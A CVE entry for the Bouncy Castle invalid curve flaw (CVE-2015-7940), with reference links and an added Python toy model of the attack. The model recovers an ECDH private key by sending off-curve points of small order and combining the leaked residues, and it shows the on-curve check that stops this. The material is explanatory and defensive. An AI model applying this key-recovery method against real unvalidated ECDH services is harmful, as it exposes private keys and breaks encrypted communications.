CVE-2015-7940
Published: Nov 9, 2015
Modified: Aug 6, 2024
PUBLISHED
Description
The Bouncy Castle Java library before 1.51 does not validate that a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie-Hellman (ECDH) key exchanges, aka an "invalid curve attack."
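The attack the description refers to, as an added example that is not Bouncy Castle's code: a toy Python ECDH in which the affine group law uses only the curve coefficient a and the prime p, never b. A party that does not check its peer's public key therefore computes d*Q for a point Q on a different curve y^2 = x^3 + a*x + b', chosen by the attacker to contain a point of small prime order r; the resulting shared secret reveals d mod r with at most r guesses, and a series of such exchanges combined by the Chinese remainder theorem recovers d. The field prime 211, the coefficients a=2 and b=7, the private key 101 and the key-confirmation oracle are constructed for illustration. The `validate_points=True` branch is the on-curve check that closes the hole; on real curves whose cofactor is greater than 1 the peer must additionally check that the point lies in the prime-order subgroup.

```python
"""Toy model of the invalid curve attack on ECDH (CVE-2015-7940). Constructed example, not
Bouncy Castle code: tiny field, made-up curve and key, and a key-confirmation oracle."""
import hashlib
from math import prod

P = 211      # constructed toy prime field (real curves use ~256-bit p; same mechanism)
A = 2        # y^2 = x^3 + A*x + B over F_P
B = 7        # the real curve's b; add()/mul() below never read it
INF = None   # point at infinity

def is_on_curve(pt, a=A, b=B, p=P):
    """The check a compliant ECDH implementation must run on a peer's public key."""
    if pt is INF:
        return True
    x, y = pt
    return (y * y - (x ** 3 + a * x + b)) % p == 0

def add(p1, p2, a=A, p=P):
    """Affine group law. Only a and p appear, so a point on y^2 = x^3 + a*x + b'
    is processed as a member of that other curve's group: the root cause."""
    if p1 is INF or p2 is INF:
        return p2 if p1 is INF else p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % p == 0:
        return INF
    if p1 == p2:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(k, pt, a=A, p=P):
    acc, q = INF, pt                             # double-and-add k*pt
    while k:
        if k & 1:
            acc = add(acc, q, a, p)
        q = add(q, q, a, p)
        k >>= 1
    return acc

def points_on(b, a=A, p=P):
    """All affine points of y^2 = x^3 + a*x + b over F_p (cheap for a toy p)."""
    roots = {}
    for y in range(p):
        roots.setdefault(y * y % p, []).append(y)
    return [(x, y) for x in range(p) for y in roots.get((x ** 3 + a * x + b) % p, [])]

def real_curve_order():
    return len(points_on(B)) + 1                 # affine points plus the point at infinity

def kdf(pt):
    """Stand-in for whatever the protocol derives from the ECDH shared secret."""
    raw = b"inf" if pt is INF else f"{pt[0]},{pt[1]}".encode()
    return hashlib.sha256(raw).hexdigest()

class Victim:
    """ECDH party holding d. validate_points=False models the pre-1.51 behaviour."""
    def __init__(self, d, validate_points):
        self.d, self.validate_points = d, validate_points

    def key_confirmation(self, peer_pub):
        if self.validate_points and (peer_pub is INF or not is_on_curve(peer_pub)):
            raise ValueError("peer public key is not a point on the curve")
        return kdf(mul(self.d, peer_pub))        # d * peer_pub, on whatever curve it is

def find_small_order_points(n_target, a=A, p=P, max_order=50):
    """Attacker precomputation: on curves sharing a but with b' != B, collect one point
    of small prime order per distinct prime until the primes' product exceeds n_target."""
    found = {}                                   # prime r -> (b', point of order r)
    for b2 in range(p):
        if b2 == B or (4 * a ** 3 + 27 * b2 * b2) % p == 0:
            continue                             # skip the real curve and singular cubics
        pts = points_on(b2, a, p)
        order = len(pts) + 1
        for r in range(2, max_order + 1):
            if order % r or r in found or any(r % s == 0 for s in range(2, r)):
                continue                         # need a new prime r dividing the order
            for pt in pts:
                q = mul(order // r, pt, a, p)   # order r unless INF (non-cyclic r-torsion)
                if q is not INF:
                    found[r] = (b2, q)
                    break
        if prod(found) > n_target:
            return found
    raise RuntimeError("could not collect enough small-order points")

def crt(residues):
    """Combine d mod r for pairwise coprime r into d mod prod(r)."""
    x, m = 0, 1
    for r, v in residues.items():
        x += m * ((v - x) * pow(m, -1, r) % r)
        m *= r
    return x % m

def recover_private_key(victim, n):
    """Attacker side. Returns d, or None when the victim rejects off-curve points."""
    residues = {}
    for r, (_b2, q) in find_small_order_points(n).items():
        assert not is_on_curve(q)                # q lies on a different curve
        try:
            tag = victim.key_confirmation(q)     # victim computes d*q = (d mod r)*q
        except ValueError:
            return None
        for k in range(r):                       # at most r guesses leak d mod r
            if kdf(mul(k, q)) == tag:
                residues[r] = k
                break
    return crt(residues)
```

With `recover_private_key(Victim(101, validate_points=False), real_curve_order())` the vulnerable party leaks 101 after a handful of exchanges, while the validating party raises before any scalar multiplication takes place. The same check belongs on every externally supplied point, static keys carried in certificates included, not only on ephemeral ECDH values.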
| Vendor | Product | Versions |
|---|---|---|
| n/a | n/a | affected n/a |
References
- RHSA-2016:2035 (vendor-advisory, x_refsource_REDHAT)
- http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html (x_refsource_CONFIRM)
- http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html (x_refsource_CONFIRM)
- https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html (x_refsource_CONFIRM)
- 79091 (vdb-entry, x_refsource_BID)
- openSUSE-SU-2015:1911 (vendor-advisory, x_refsource_SUSE)
- FEDORA-2015-7d95466eda (vendor-advisory, x_refsource_FEDORA)
- http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html (x_refsource_CONFIRM)
- RHSA-2016:2036 (vendor-advisory, x_refsource_REDHAT)
- http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html (x_refsource_CONFIRM)
- USN-3727-1 (vendor-advisory, x_refsource_UBUNTU)
- [oss-security] 20151022 Re: CVE Request: invalid curve attack on bouncycastle (mailing-list, x_refsource_MLIST)
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html (x_refsource_CONFIRM)
- 1037036 (vdb-entry, x_refsource_SECTRACK)
- [oss-security] 20151022 CVE Request: invalid curve attack on bouncycastle (mailing-list, x_refsource_MLIST)
- DSA-3417 (vendor-advisory, x_refsource_DEBIAN)
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html (x_refsource_CONFIRM)
- 1037046 (vdb-entry, x_refsource_SECTRACK)
- 1037053 (vdb-entry, x_refsource_SECTRACK)
- https://www.oracle.com/security-alerts/cpuapr2020.html (x_refsource_MISC)